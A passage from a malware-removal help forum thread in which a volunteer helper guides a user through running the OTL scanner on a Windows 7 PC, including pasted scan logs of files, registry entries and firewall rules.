[2014/07/22 14:02:04 | 000,005,355 | ---- | C] () -- C:\Windows\hpomdl18.dat.temp
[2014/01/25 06:26:34 | 000,000,207 | ---- | C] () -- C:\Windows\tweaking.com-regbackup-BRIAN-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
[2013/10/15 05:55:16 | 000,165,376 | ---- | C] () -- C:\Windows\SysWow64\unrar.dll
[2013/08/06 16:23:26 | 000,000,258 | RHS- | C] () -- C:\Users\BR\ntuser.pol
[2012/12/02 12:08:02 | 000,000,105 | ---- | C] () -- C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
[2012/10/03 17:23:13 | 000,049,261 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD6.1
[2012/10/03 17:23:12 | 000,136,857 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD6.0
[2012/10/03 17:23:12 | 000,049,486 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD6.JPG
[2012/10/03 17:22:42 | 000,050,685 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD5.1
[2012/10/03 17:22:40 | 000,135,858 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD5.0
[2012/10/03 17:22:40 | 000,050,520 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD5.JPG
[2012/10/03 17:22:18 | 000,134,269 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD4.0
[2012/10/03 17:22:18 | 000,049,466 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD4.JPG
[2012/10/03 17:21:55 | 000,115,714 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD3.0
[2012/10/03 17:21:55 | 000,038,427 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD3.JPG
[2012/10/03 17:21:35 | 000,121,078 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD1.0
[2012/10/03 17:21:35 | 000,044,248 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD1.JPG
[2012/10/03 17:18:39 | 000,112,551 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD2.0
[2012/10/03 17:18:39 | 000,040,181 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpNOMAD2.JPG
[2012/09/23 13:15:55 | 000,132,533 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpFM3 #2 001.JPG
[2012/09/23 13:15:52 | 000,132,486 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpFM3 #2 001.1
[2012/09/23 13:15:39 | 000,003,890 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpFM3 #2 001_navi.JPG
[2012/09/23 13:15:33 | 000,137,289 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpFM3 #2 001.0
[2012/08/22 15:05:20 | 000,006,400 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpUNTITLED LOGO XX2_THUMBNAIL(0).0
[2012/08/22 15:05:20 | 000,001,969 | ---- | C] () -- C:\Users\BR\AppData\Local\tmpUNTITLED LOGO XX2_THUMBNAIL(0).JPG
[2012/06/07 20:09:05 | 000,000,000 | ---- | C] () -- C:\Users\BR\AppData\Local\Temptable.xml
[2012/06/07 13:40:49 | 000,016,016 | ---- | C] () -- C:\Users\BR\carbon_steel.jpg
[2012/03/14 08:36:24 | 000,682,208 | ---- | C] () -- C:\Users\BR\P9010008(0).JPG
[2012/03/14 08:36:24 | 000,670,313 | ---- | C] () -- C:\Users\BR\P9010021(0).JPG
[2012/03/13 17:47:41 | 000,000,173 | ---- | C] () -- C:\ProgramData\LockFilePath.ini
[2012/03/13 04:27:04 | 000,682,208 | ---- | C] () -- C:\Users\BR\P9010008.JPG
[2012/03/13 04:27:04 | 000,670,313 | ---- | C] () -- C:\Users\BR\P9010021.JPG
 
========== ZeroAccess Check ==========
 
[2009/07/13 20:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/06/24 18:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/06/24 17:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 17:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 04:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 17:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2013/10/05 04:38:00 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Alibaba
[2012/12/15 12:38:55 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\AnvSoft
[2013/08/27 17:43:52 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Autodesk
[2014/09/08 12:58:09 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Awesome Duplicate Photo Finder
[2014/09/08 16:30:27 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\BitTorrent
[2012/08/20 18:16:29 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Canneverbe Limited
[2014/09/04 09:57:06 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\com.adobe.downloadassistant.AdobeDownloadAssistant
[2012/06/07 13:07:43 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\DassaultSystemes
[2012/06/07 13:07:43 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\EDrawings
[2014/11/13 09:09:56 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\FirefoxToolbar
[2014/09/04 16:27:52 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Foxit Software
[2013/08/31 10:05:33 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Free-PDF-to-Word.com
[2014/11/24 16:40:54 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\FreeBurner
[2012/11/14 07:42:35 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\funkitron
[2013/08/21 07:46:03 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\KeePass
[2014/11/23 10:18:41 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\No Company Name
[2014/09/11 06:59:07 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Oberon Media
[2013/08/31 09:40:33 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\OpenOffice
[2014/09/04 11:21:22 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\PDAppFlex
[2012/12/02 12:09:02 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Photobucket
[2013/09/08 00:52:10 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\PlayFirst
[2014/11/24 16:53:27 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\PowerISO
[2014/11/13 17:51:47 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\RHEng
[2014/11/13 17:51:38 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\rmi
[2013/09/19 14:07:58 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\SmartDraw
[2012/04/18 22:06:38 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\TeamViewer
[2012/09/13 07:52:41 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\TightVNC
[2013/09/02 09:52:38 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\WildTangent
[2012/04/02 07:58:49 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\Windows Live Writer
 
========== Purity Check ==========
 
 
 
========== Files - Unicode (All) ==========
[2012/03/14 08:44:01 | 001,133,304 | ---- | C] ()(C:\Users\BR\Documents\??0014(0).JPG) -- C:\Users\BR\Documents\扫描0014(0).JPG
[2012/03/14 08:43:54 | 000,019,267 | ---- | C] ()(C:\Users\BR\Documents\SYC86 ?? internal fan(0).pdf) -- C:\Users\BR\Documents\SYC86 馬達 internal fan(0).pdf
[2012/03/13 04:33:01 | 001,133,304 | ---- | C] ()(C:\Users\BR\Documents\??0014.JPG) -- C:\Users\BR\Documents\扫描0014.JPG
[2012/03/13 04:32:55 | 000,019,267 | ---- | C] ()(C:\Users\BR\Documents\SYC86 ?? internal fan.pdf) -- C:\Users\BR\Documents\SYC86 馬達 internal fan.pdf
[2009/05/27 17:49:52 | 001,133,304 | ---- | M] ()(C:\Users\BR\Documents\??0014.JPG) -- C:\Users\BR\Documents\扫描0014.JPG
[2009/05/27 17:49:52 | 001,133,304 | ---- | M] ()(C:\Users\BR\Documents\??0014(0).JPG) -- C:\Users\BR\Documents\扫描0014(0).JPG
[2009/04/15 21:15:20 | 000,019,267 | ---- | M] ()(C:\Users\BR\Documents\SYC86 ?? internal fan.pdf) -- C:\Users\BR\Documents\SYC86 馬達 internal fan.pdf
[2009/04/15 21:15:20 | 000,019,267 | ---- | M] ()(C:\Users\BR\Documents\SYC86 ?? internal fan(0).pdf) -- C:\Users\BR\Documents\SYC86 馬達 internal fan(0).pdf
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 917 bytes -> C:\Users\BR\Documents\Re_ 1965 Chevrolet Corvette on UsedCorvettesOnline.com.eml:OECustomProperty
@Alternate Data Stream - 917 bytes -> C:\Users\BR\Documents\Re_ 1965 Chevrolet Corvette on UsedCorvettesOnline.com(0).eml:OECustomProperty
@Alternate Data Stream - 829 bytes -> C:\Users\BR\Documents\Aluminum Fabricated Tables.eml:OECustomProperty
@Alternate Data Stream - 781 bytes -> C:\Users\BR\Documents\P.O. For tumble weed.eml:OECustomProperty
@Alternate Data Stream - 781 bytes -> C:\Users\BR\Documents\P.O. For tumble weed(0).eml:OECustomProperty
@Alternate Data Stream - 613 bytes -> C:\Users\BR\Documents\reaper pic sept.eml:OECustomProperty
@Alternate Data Stream - 613 bytes -> C:\Users\BR\Documents\reaper pic sept(0).eml:OECustomProperty
@Alternate Data Stream - 357 bytes -> C:\ProgramData\Temp:7A8EE542

< End of report >


- General Instructions -

  • Please read all instructions and fixes thoroughly. Read the ENTIRE post BEFORE performing any steps so you understand all that needs to be done.
  • I would advise printing any instructions for easy reference as some of the fixes may require you to boot in Safe mode. Access to these instructions may not be available in Safe Mode.
  • Any fixes provided by myself are for this log file only and should not be used on any other systems.
  • Do not run any other removal software or perform updates other than the ones I provide, as it will complicate the cleaning process.
  • It's very likely that part of our cleanup will include emptying your recycle bin. If you use your recycle bin as an archive and do not wish this to be emptied, please let me know.
  • You have 4 days to reply to each post or the topic will be closed. You will be able to request that the topic be re-opened by sending me a PM (Personal Message) or PM a moderator.
  • Please feel free to ask any questions, especially if you are having problems with my instructions.


- Save ALL Tools to your Desktop-

 

All tools that I have you download should be placed on the desktop unless otherwise stated. If you are familiar with how to save files to the desktop then you can skip this step.
 
Since you are continuing with this step then I assume you are unfamiliar with saving files to your desktop. As a result it's easiest if you configure your browser(s) to download any tools to the desktop by default. Please use the appropriate instructions below depending on the browser you are using.
Chrome.JPGGoogle Chrome - Click the "Customize and control Google Chrome" button in the upper right-corner of the browser.Settings.JPG Choose Settings. at the bottom of the screen click the
"Show advanced settings..." link. Scroll down to find the Downloads section and click the Change... button. Select your desktop and click OK.
Firefox.JPGMozilla Firefox - Click the "Open Menu" button in the upper right-corner of the browser. Settings.JPG Choose Options. In the downloads section, click the Browse button, click on the Desktop folder
and the click the "Select Folder" button. Click OK to get out of the Options menu.
IE.jpgInternet Explorer - Click the Tools menu in the upper right-corner of the browser. Tools.JPG Select View downloads. Select the Options link in the lower left of the window. Click Browse and
select the Desktop and then choose the Select Folder button. Click OK to get out of the download options screen and then click Close to get out of the View Downloads screen.
NOTE: IE8 Does not support changing download locations in this manner. You will need to download the tool(s) to the default folder, usually Downloads, then copy them to the desktop.
 

- Finally Before We Start-

 
Removing malware is a complicated multiple step process, Please stay with me until I have declared your system clean. I strongly recommend you backup your personal files and folders. Although rare, attempting to remove malware can render your machine unbootable or cause data loss. Having backups of your data is your responsibility. Your security programs may give warnings for some of the tools I will ask you to use. Be assured, any links I give are safe.

 

 

 

 

I'm reviewing your log now. There should also be an Extras.txt file in your Downloads folder. If you could post the contents of that it would be appreciated. Thank you.

Hi Brian, there does not seem to be a Extra txt. file that I can find . I reran the Otl. again , same result no file here is the Otl file that I just ran,.

Sorry for not getting back to you sooner but I usually get a notification that you responded via email. This time I had to go back and see if I had a reply to my post.

  Thanx again for all your help!!


Edited by RUSTY2, 30 December 2014 - 01:23 PM.

  • 0

#4
BrianDrab

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts

No problem. Please do the following.

 

1. Move OTL.exe from your Downloads directory to your desktop. This will make things easier.
2. Open it back up by right-clicking on it and choose Run as administrator.
3. Check "Use SafeList" under the Extra Registry section.
    Extras.JPG
4. Click the Run Scan button.
5. OTL.txt and Extras.txt will be opened and created on your desktop. Since I already have the OTL, please paste the Extras.txt into your next reply.


  • 0

#5
RUSTY2

RUSTY2

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 221 posts

No problem. Please do the following.

 

1. Move OTL.exe from your Downloads directory to your desktop. This will make things easier.
2. Open it back up by right-clicking on it and choose Run as administrator.
3. Check "Use SafeList" under the Extra Registry section.
    Extras.JPG
4. Click the Run Scan button.
5. OTL.txt and Extras.txt will be opened and created on your desktop. Since I already have the OTL, please paste the Extras.txt into your next reply.

Hi Brian, ran it again with the Use safelist marked still no extra txt. just the Otl file,  I am rerunning it again now hope it works

got it here is the other fileOTL Extras logfile created on: 30/12/2014 11:56:51 AM - Run 10
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\BR\Downloads
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17501)
Locale: 00001009 | Country: Canada | Language: ENC | Date Format: dd/MM/yyyy
 
6.97 Gb Total Physical Memory | 3.39 Gb Available Physical Memory | 48.67% Memory free
13.93 Gb Paging File | 10.90 Gb Available in Paging File | 78.28% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 920.39 Gb Total Space | 752.82 Gb Free Space | 81.79% Space Free | Partition Type: NTFS
Drive D: | 11.02 Gb Total Space | 1.59 Gb Free Space | 14.44% Space Free | Partition Type: NTFS
Drive F: | 7.45 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: UDF
Drive K: | 2794.49 Gb Total Space | 2794.03 Gb Free Space | 99.98% Space Free | Partition Type: NTFS
 
Computer Name: BRIAN-PC | User Name: BR | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.html [@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
 
[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
http [open] -- Reg Error: Key error.
https [open] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
http [open] -- Reg Error: Key error.
https [open] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
"FirewallDisableNotify" = 0
"AntiVirusDisableNotify" = 0
"UpdatesDisableNotify" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01  [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
 
========== System Restore Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0
 
========== Firewall Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
========== Authorized Applications List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe" = C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe:*:Enabled:Logitech Harmony Remote Software 7 -- ()
"C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe" = C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe:*:Enabled:Logitech Harmony Remote Software 7 -- ()
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe" = C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe:*:Enabled:Logitech Harmony Remote Software 7 -- ()
"C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe" = C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe:*:Enabled:Logitech Harmony Remote Software 7 -- ()
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{05AFC209-20FE-4F88-90BB-424C39DFCAAD}" = lport=4482 | protocol=6 | dir=in | name=blackberry desktop software wireless music sync data transfer |
"{0CCE5FDA-EDA4-4091-8400-D75985B77D24}" = rport=139 | protocol=6 | dir=out | app=system |
"{14334F7E-BD33-45D5-9167-445BAE902D2F}" = lport=5357 | protocol=6 | dir=in | name=ws-eventing tcp port 5357 |
"{18E6D049-406C-470E-B935-D4BFF6B17EB3}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{1C28582A-6005-4E87-887E-69EDFA5030E6}" = lport=445 | protocol=6 | dir=in | app=system |
"{363E4391-9356-4168-B15E-C86604A1EA5E}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{4D9DB505-3E62-451C-ACDF-5A1F323CC578}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | [email protected],-28539 |
"{58EAC530-B423-4843-B9D0-ADB0C8580382}" = rport=445 | protocol=6 | dir=out | app=system |
"{639D9F19-8718-45D5-AD0D-4BE7BCEAEE31}" = lport=4481 | protocol=17 | dir=in | name=blackberry desktop software wireless music sync discovery |
"{657E69FE-BCBF-4EB7-B1EA-5B68E4A80A3B}" = lport=139 | protocol=6 | dir=in | app=system |
"{8322F237-E043-4304-BAB8-D62CF9C09888}" = rport=138 | protocol=17 | dir=out | app=system |
"{939AA9B2-26E7-40B6-8CE4-A71AD4B05CA7}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{998DF378-6CF8-4E73-A2F7-DA195EDEAA44}" = rport=137 | protocol=17 | dir=out | app=system |
"{A1072BA6-D906-462B-BD7E-973AD33BCDB9}" = lport=138 | protocol=17 | dir=in | app=system |
"{B3A101E3-A8A1-4C72-B2E3-49493D2F0395}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{B5B63A6E-4404-4E19-8E90-1E72C9851FD4}" = lport=137 | protocol=17 | dir=in | app=system |
"{CF158AF2-9BB2-47EE-84AB-D7532D9A493D}" = lport=4481 | protocol=6 | dir=in | name=blackberry desktop software wireless music sync data transfer |
"{D77078D7-7582-408C-B0F6-3B0708EB9CB1}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{EA5ACFC9-BF22-4AD3-95AD-57757C602545}" = lport=4482 | protocol=17 | dir=in | name=blackberry desktop software wireless music sync discovery |
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{01A0F86B-D1BB-4A1A-A7E3-F562EFD0B765}" = protocol=17 | dir=in | app=c:\users\br\appdata\local\temp\7zs364c\hpdiagnosticcoreui.exe |
"{02A2B2EA-46DF-4BDF-9434-3F6025586796}" = dir=in | app=c:\program files\hp\hp officejet pro 8620\bin\devicesetup.exe |
"{09AFF3E5-70B2-4C7D-9065-BD24CE958B04}" = protocol=17 | dir=in | app=c:\users\br\appdata\local\temp\7zs5c14\hppiw.exe |
"{1F9A0472-A476-41D4-95BE-DD7C29CABDB8}" = protocol=17 | dir=in | app=c:\program files (x86)\yourfiledownloader\yourfiledownloader.exe |
"{205D453F-6B0C-49F1-8E3B-88A795325DB7}" = protocol=17 | dir=in | app=c:\users\br\downloads\free_download_bobcat_753_parts_manual_pdf_downloader.exe |
"{23FFA2D7-C28C-4039-9E52-FFF85567EFEB}" = protocol=17 | dir=in | app=c:\users\br\appdata\local\temp\7zs57b3\hpdiagnosticcoreui.exe |
"{2E3E8CCE-3F03-49F9-9EB1-C09F25A94B65}" = protocol=1 | dir=in | [email protected],-28543 |
"{2F014F6C-D720-4B7D-B05A-326118839A59}" = protocol=6 | dir=in | app=c:\program files (x86)\yourfiledownloader\downloader.exe |
"{40B1D8B8-8E71-4153-8D1C-95105D31541A}" = protocol=6 | dir=out | app=c:\program files (x86)\rosetta stone\rosetta stone version 3\rosettastoneversion3.exe |
"{41005087-7FD4-4EAE-9855-9F8AAC61ED28}" = protocol=6 | dir=in | app=c:\users\br\appdata\local\temp\7zs364c\hpdiagnosticcoreui.exe |
"{410E0D16-6ED3-4B12-8D29-4F3D2C74872A}" = dir=in | app=c:\program files\hp\hp officejet pro 8620\bin\digitalwizards.exe |
"{4847D249-C065-4B72-A80B-C4C03D41A504}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{4F0BACF6-B682-434A-9963-E97F7FA6DC30}" = protocol=17 | dir=in | app=c:\program files (x86)\research in motion\blackberry desktop\rim.desktop.exe |
